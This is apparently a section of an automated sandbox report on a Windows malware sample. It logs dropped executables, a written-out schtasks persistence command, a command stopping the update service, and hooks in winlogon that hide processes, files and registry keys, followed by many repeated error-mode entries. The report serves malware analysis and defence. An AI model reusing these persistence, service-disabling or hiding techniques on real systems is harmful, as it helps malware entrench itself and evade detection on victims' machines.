Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	File created: C:\Users\user\AppData\Local\Temp\nsd7E6A.tmp\nsExec.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Microsoft\setup.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	File created: C:\Users\user\AppData\Local\Microsoft\ofg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\brave.exe	File created: C:\Users\user\AppData\Local\Temp\3A08.tmp	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn \ipNnOYSRDI /tr \"C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"

Source: C:\Windows\System32\dialer.exe

File created: C:\Windows\Tasks\dialersvc32.job

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Hooks registry keys query functions (used to hide registry keys)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Hooks processes query functions (used to hide processes)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks files or directories query functions (used to hide files and directories)

Source: winlogon.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Modifies the prolog of user mode functions (user mode inline hooks)

Source: winlogon.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\AppData\Local\Microsoft\brave.exe

Module Loaded: C:\PROGRAM FILES\GOOGLE\CHROME\UPDATER.EXE

Source: C:\Windows\System32\dialer.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node dialerstager

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\ofg.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\ofg.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ipNnOYSRDI\svcupdater.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\setup.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
